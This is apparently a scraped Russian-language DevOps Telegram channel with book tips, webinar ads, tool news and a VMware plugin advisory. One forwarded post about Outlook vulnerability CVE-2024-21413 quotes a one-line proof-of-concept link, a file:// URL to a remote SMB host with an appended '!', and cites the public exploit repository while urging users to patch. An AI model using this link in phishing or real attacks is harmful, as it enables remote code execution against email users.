Продолжаем делиться опытом через книги.
👉 Сегодня это — Облачные технологии. Практическое руководство по созданию инновационных приложений
Эта книга представляет собой руководство по разработке приложений с использованием облачных технологий: от базовых концепций облачных вычислений до передовых методик и стратегий оптимизации.
Читатели получат углубленное понимание моделей облачных вычислений, архитектуры облачных приложений и эффективного использования облачных сервисов и ресурсов.
Книга акцентирует внимание на вопросах безопасности в облачных средах и предлагает конкретные рекомендации по управлению доступом, шифрованию данных и мониторингу безопасности.
Читайте и делитесь с коллегами 🤝
#devops #devopsbooks
@DevOpsKaz
👉 Сегодня это — Облачные технологии. Практическое руководство по созданию инновационных приложений
Эта книга представляет собой руководство по разработке приложений с использованием облачных технологий: от базовых концепций облачных вычислений до передовых методик и стратегий оптимизации.
Читатели получат углубленное понимание моделей облачных вычислений, архитектуры облачных приложений и эффективного использования облачных сервисов и ресурсов.
Книга акцентирует внимание на вопросах безопасности в облачных средах и предлагает конкретные рекомендации по управлению доступом, шифрованию данных и мониторингу безопасности.
Читайте и делитесь с коллегами 🤝
#devops #devopsbooks
@DevOpsKaz
❤9👍5🔥5⚡2
Infisical позволяет синхронизировать секреты в вашей команде/инфраструктуре и предотвратите утечку секретов.
Этим контентом поделился наш подписчик. Не забывайте делиться своими наработками, новостями или другим 🤝
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13❤3⚡3👍3👾2
😱 Компания обещает снизить зависимость разработчиков от SRE-инженеров, DevOps и экспертов по инфраструктуре. А всё потому, что компания полагает: сегодняшние инструменты наблюдения не предназначены для разработчиков.
Информационные панели сложны, перегружены и предоставляют некоррелированную визуализацию данных. А еще требуют 100% участия человека 😃
Что думаете по этому поводу? Пишите в комменты 👇🏼
#devops #sre #observability
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🤡9🔥6⚡2❤2👾2
Задача — настроить оповещение в Slack о нагрузках базы данных. Арман Нургалиев, эксперт и Cloud Architect в Core 24/7 не нашел идеального ответа, как это сделать с помощью стандартных инструментов.
Поэтому он нашел собственное решение и описал инструкцию в статье.
👉 Читайте подробнее, ставьте лайки и делитесь с коллегами
#slack #cloud #awsrds #prometheus #aws
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11❤5👍4⚡2🤡2
👉 Смотрите здесь. 3,5 тысячи лайков, между прочим
Вас проведут через полную настройку конвейера, подробно описав каждый шаг:
• установка и настройка Jenkins с TLS для безопасной связи
• установка и настройка Sonarqube с TLS для статического анализа кода и проверок качества • создание и отправка контейнеров Docker в Docker Hub, используя возможности контейнеризации для беспрепятственного развертывания • использование ArgoCD для непрерывного развертывания образа DockerПо традиции предлагаем использовать Яндекс Браузер со встроенным синхронным переводчиком.
#devops #kubernetes #jenkins #cicd #docker
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7❤5👍5⚡3
28 февраля, Ср
Вебинар «Как выбрать IT-инфраструктуру для e-commerce: кейс Uzum Nasiya»
Приглашаем на бесплатный вебинар, посвященный выбору IT-инфраструктуры для e-commerce проектов. Суннат Шамуратов, директор по развитию бизнеса Servercore, расскажет, как решать задачи рынка онлайн-коммерции с помощью продуктов облачной платформы.
Приглашенный спикер Сардорбек Байахмедов, руководитель проектного офиса Uzum Nasiya, поделится опытом миграции IT-инфраструктуры в облако Servercore.
В программе:
— Тренды рынка 2024 и ключевые цифры e-commerce.
— Какие бизнес-задачи стоят перед проектами онлайн-коммерции.
— IT-инфраструктура для решения задач в электронной коммерции.
— Кейс компании Uzum Nasiya: как компания целиком перенесла IT-инфраструктуру в Servercore за 1 месяц.
🔺 Новые участники получат 15 000 тенге для тестирования сервисов.
Регистрируйтесь на вебинар по ссылке.
Вебинар «Как выбрать IT-инфраструктуру для e-commerce: кейс Uzum Nasiya»
Приглашаем на бесплатный вебинар, посвященный выбору IT-инфраструктуры для e-commerce проектов. Суннат Шамуратов, директор по развитию бизнеса Servercore, расскажет, как решать задачи рынка онлайн-коммерции с помощью продуктов облачной платформы.
Приглашенный спикер Сардорбек Байахмедов, руководитель проектного офиса Uzum Nasiya, поделится опытом миграции IT-инфраструктуры в облако Servercore.
В программе:
— Тренды рынка 2024 и ключевые цифры e-commerce.
— Какие бизнес-задачи стоят перед проектами онлайн-коммерции.
— IT-инфраструктура для решения задач в электронной коммерции.
— Кейс компании Uzum Nasiya: как компания целиком перенесла IT-инфраструктуру в Servercore за 1 месяц.
🔺 Новые участники получат 15 000 тенге для тестирования сервисов.
Регистрируйтесь на вебинар по ссылке.
👍4⚡2👎2🔥2
Спикер вебинара — опытный Golang-разработчик Алексей.
🙋🏼♂️Алексей не просто пишет код, а создаёт настоящие произведения искусства. У него за плечами множество проектов, включая микросервисные решения, цифровой тенге и блокчейн.
В программе вебинара:
🔸 Введение в многопоточность Golang
🔹 Механизмы синхронизации го-рутин на практике
🔸 Работа с микросервисами
🔹 Возможность задать вопросы опытному разработчику
👉 Подключайтесь в пятницу, 23 февраля, в 19:00 по Астане
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9🔥6❤2
Есть и теория, и практика, но экзамен придется сдавать отдельно.
Также для тех, кто не выиграл в прошлом конкурсе, могут пригодятся скидочки 50% от Linux Foundation.
👉 Забирайте здесь и делитесь с коллегами
#kubernetes #cks #k8s #devops
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15🔥6👾4🤡2
This media is not supported in your browser
VIEW IN TELEGRAM
Понедельник начинается не с кофе 🤣
А если серьезно — многие считают, что Kubernetes сложен из-за экосистемы интегрируемых инструментов, но на деле — благодаря этому он и полезен.
Поделитесь в комментах, какую интеграцию в Kubernetes вы считаете самой эффективной 👇🏼
@DevOpsKaz
А если серьезно — многие считают, что Kubernetes сложен из-за экосистемы интегрируемых инструментов, но на деле — благодаря этому он и полезен.
Поделитесь в комментах, какую интеграцию в Kubernetes вы считаете самой эффективной 👇🏼
@DevOpsKaz
👍9🤣7❤4🔥2👾2
Компания VMware призвала администраторов удалить устаревший аутентификационный плагин VMware Enhanced Authentication Plug-in (EAP). Он подвержен атакам типа authentication relay, а также перехвату сессий из-за двух неисправленных уязвимостей.
«Злоумышленник может вынудить пользователя домена с установленным в браузере EAP запрашивать и передавать сервисные билеты для произвольных Active Directory Service Principal Names (SPN). Также атакующий с непривилегированным локальным доступом может перехватить привилегированный сеанс EAP».
Чтобы удалить или отключить EAP, нужно выполнить ряд PowerShell-команд — вот инструкция.
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9❤2🔥2👾2
Они упрощают задачу, шаг за шагом помогая выполнить упражнения, предоставляя наборы данных, примеры команд и терминал, где можно проверить результат.
Пользуйтесь и делитесь с коллегами 🤝
#devops #postgresql #sql #database #db
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥21👍7❤3⚡3👾2
Многие новые проекты стараются с самого начала использовать облачные технологии, но когда бизнес требует быстрой миграции большого количества приложений, организации предпочитают переносить их как есть. Например, компания GE Oil & Gas, выявила, что даже без внедрения каких-либо облачных оптимизаций она может сэкономить около 30% своих затрат за счет рехостинга.
Вы можете сделать несколько облачных оптимизаций, чтобы получить выгоду, но в остальном вы не меняете основную архитектуру приложения. Например, вы хотите сократить количество времени, которое тратите на управление экземплярами баз данных.
Чаще всего мы видим (repurchasing) как переход на SaaS платформу. Переход CRM на Salesforce.com, HR-системы на Workday, CMS на Drupal и так далее.
Переосмысление архитектуры и разработки приложения, как правило, с использованием нативных облачных (cloud-native) функций. Вызвано потребностью бизнеса в добавлении новых функций, масштабировании или увеличении производительности.
До 20% корпоративного портфеля приложений больше не используются и их можно просто отключить. Такая экономия может повысить эффективность бизнеса, направив высвободившиеся бюджет другим командам.
Обычно это означает «пересмотреть» или ничего не делать (пока что). Вы должны переносить только то, что имеет смысл для бизнеса.
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9🔥5❤2👾2
Узнайте о тенденциях оптимизации затрат Kubernetes, устраните разрыв между выделением ресурсов и фактическим использованием ЦП/памяти в 4 000 кластерах и получите практические советы, как избежать излишних затрат.
👉 Отчёт основан на анализе 4 000 кластеров, работающих на AWS, Azure и GCP с 1 января по 31 декабря 2023 года до их оптимизации.
#devops #aws #k8s #kubernetes #azure #gcp
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7❤4🔥3
Forwarded from Делаем IT
Большая онлайн-встреча с лидерами веб и мобильного рынка пройдет уже сегодня🔖
Обсудим, с какими проблемами мы столкнулись в 2023 году и какие строим планы по развитию на 2024 год.
Подключайтесь в 18:00 по ссылке 🔗
Участники:
— Иван Клюкин СЕО из Synaptik
— Анатолий Дубенчак СЕО из Пиксель Плюс
— CEО Дима Юрин, Делаем IT
— СЕО Александр Комбаров из Пиробайта
— Вячеслав Кислицын СЕО из Reactive
— Дима Балыкин Сo-founder из Сedro
Приглашенный эксперт: Петр Федюшкин — Директор Partners’ Club by AGIMA
Обсудим, с какими проблемами мы столкнулись в 2023 году и какие строим планы по развитию на 2024 год.
Подключайтесь в 18:00 по ссылке 🔗
Участники:
— Иван Клюкин СЕО из Synaptik
— Анатолий Дубенчак СЕО из Пиксель Плюс
— CEО Дима Юрин, Делаем IT
— СЕО Александр Комбаров из Пиробайта
— Вячеслав Кислицын СЕО из Reactive
— Дима Балыкин Сo-founder из Сedro
Приглашенный эксперт: Петр Федюшкин — Директор Partners’ Club by AGIMA
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥3❤2⚡2
Forwarded from 3side кибербезопасности
Публичный эксплойт на критическую уязвимость Microsoft Outlook
Буквально сегодня в публичном доступе появился эксплойт в виде Poc (Proof of concept) для всех современных версий Outlook. Эксплойт позволяет выполнить удаленный код с правами приложения в обход всех проверок Майкрософт!
Оказалось, для обхода всех проверок и механизмов защиты достаточно в конец расширения документа добавить восклицательный знак. Пример исследователей Check Point:
От жертвы необходимо лишь нажать на ссылку в письме и код будет выполнен. Очевидно, что уязвимость будет максимально широко использоваться в фишинге.
Для защиты рекомендуется как можно быстрее установить обновление приложения.
Подробное описание уязвимости тут.
Оригинальное исследование тут.
Буквально сегодня в публичном доступе появился эксплойт в виде Poc (Proof of concept) для всех современных версий Outlook. Эксплойт позволяет выполнить удаленный код с правами приложения в обход всех проверок Майкрософт!
Оказалось, для обхода всех проверок и механизмов защиты достаточно в конец расширения документа добавить восклицательный знак. Пример исследователей Check Point:
*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>* От жертвы необходимо лишь нажать на ссылку в письме и код будет выполнен. Очевидно, что уязвимость будет максимально широко использоваться в фишинге.
Для защиты рекомендуется как можно быстрее установить обновление приложения.
Подробное описание уязвимости тут.
Оригинальное исследование тут.
GitHub
GitHub - xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability: Microsoft-Outlook-Remote-Code-Execution-Vulnerability
Microsoft-Outlook-Remote-Code-Execution-Vulnerability - xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
🔥9👍6❤3
👉 Что есть в репозитории:
#cicd #devops #gitlab #jenkins
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5⚡4👍4❤3👾2
Фреймворк для создания сетевых сервисов
Платформа Pingora — среда Rust для создания программируемых сетевых сервисов. Открытый исходный код, безопасность, асинхронность и многопоточность.
Помогает создавать сервисы поверх HTTP/1 и HTTP/2, TLS или TCP/UDP. В качестве прокси-сервера он поддерживает сквозное проксирование. Поддерживает как широко используемые библиотеки OpenSSL, так и BoringSSL, которые соответствуют требованиям FIPS и пост-квантовому шифрованию.
#devops #rust
@DevOpsKaz
Платформа Pingora — среда Rust для создания программируемых сетевых сервисов. Открытый исходный код, безопасность, асинхронность и многопоточность.
Помогает создавать сервисы поверх HTTP/1 и HTTP/2, TLS или TCP/UDP. В качестве прокси-сервера он поддерживает сквозное проксирование. Поддерживает как широко используемые библиотеки OpenSSL, так и BoringSSL, которые соответствуют требованиям FIPS и пост-квантовому шифрованию.
#devops #rust
@DevOpsKaz
👍4❤3🔥2🤡2👾2
👉 В статье вы узнаете про:
Пользуйтесь и делитесь с коллегами 🤝
#devsecops #devops #api #apisecurity
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥3⚡2❤2👾2
В феврале мы писали про платформу обучения SRE, которая поможет подготовиться к экзаменам CKA, CKS и CKAD. Вам зашло!
👉 Сегодня делимся видеоподкастом, где люди, причастные к платформе, обсуждают, как и чем она живет и много всего интересного:
👉 Ссылка на платформу
#devops #cka #cks #ckad #kubernetes #aws #eks
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
DKT64 - Тренажер подготовки к экзамену CKS и CKA(D)
В данном выпуске у нас "на кухне" в гостях Виктор Николаев, развивающий платформу-тренажер для подготовки к Kubernetes сертификации. В выпуске мы обсудим саму платформу, как и чем она живет и много всего интересного.
ССЫЛКИ
👨💻 Код проекта - https://git…
ССЫЛКИ
👨💻 Код проекта - https://git…
👍9🔥4⚡2❤2👾2
☁️ VK Cloud Meetup: Облачные технологии
Это возможность узнать о современных облачных технологиях, архитектурных решениях и Cloud-Native подходах. Спикеры поделятся трендами, кейсами и методами эффективного внедрения инструментов, оптимизации процессов и работы в команде.
🎙 Арман Нургалиев — Cloud Architect в Core24/7, автор статей канала KazDevOps. Мигрировал и внедрял более 40 проектов в публичных облаках при помощи terraform.
🎙 Александр Волынский — технический менеджер продукта VK Cloud. Более 15 лет опыта создания и внедрения решений для обработки данных на базе облачных сервисов. Эксперт в области Data Science и Data Engineering.
🎙 Сергей Смирнов — CPO облачной платформы bult.pro, TSARKA. Имеет 10-летний опыт в разработке приложений и высоконагруженных систем, работал в инфраструктурных командах Яндекса.
🚀 Приглашаем всех заинтересованных присоединиться к обсуждению и обмену опытом!
Формат митапа — оффлайн, но также будет онлайн-трансляция.
🗓 Дата: 14 марта (четверг) 2024
🕰 Начало: 17:00
📍 Место: Most IT Hub, Ходжанова, 2/2
👉 Регистрируйтесь здесь
Ждем вас на митапе!
Это возможность узнать о современных облачных технологиях, архитектурных решениях и Cloud-Native подходах. Спикеры поделятся трендами, кейсами и методами эффективного внедрения инструментов, оптимизации процессов и работы в команде.
🎙 Арман Нургалиев — Cloud Architect в Core24/7, автор статей канала KazDevOps. Мигрировал и внедрял более 40 проектов в публичных облаках при помощи terraform.
🎙 Александр Волынский — технический менеджер продукта VK Cloud. Более 15 лет опыта создания и внедрения решений для обработки данных на базе облачных сервисов. Эксперт в области Data Science и Data Engineering.
🎙 Сергей Смирнов — CPO облачной платформы bult.pro, TSARKA. Имеет 10-летний опыт в разработке приложений и высоконагруженных систем, работал в инфраструктурных командах Яндекса.
Формат митапа — оффлайн, но также будет онлайн-трансляция.
🗓 Дата: 14 марта (четверг) 2024
🕰 Начало: 17:00
📍 Место: Most IT Hub, Ходжанова, 2/2
👉 Регистрируйтесь здесь
Ждем вас на митапе!
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5❤4🔥4⚡2
Улучшили Grafana Alerting, обновили визуализацию, внедрили новый плагин и многое другое.
Например, теперь есть инструмент предварительного просмотра миграции оповещений в Grafana Alerting — можно просматривать, редактировать и удалять перенесенные правила перед переключением. Также упростили маршрутизацию уведомлений.
Новый плагин позволяет пользователям напрямую запрашивать и визуализировать данные из SurrealDB в Grafana.
👉 Посмотрите весь список обновлений
А для тех, кто еще не пользовался Grafana, предлагаем глянуть мастер-класс Grafana as code — может, захотите попробовать 😜
#devops #grafana
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5⚡2❤2👍2👾2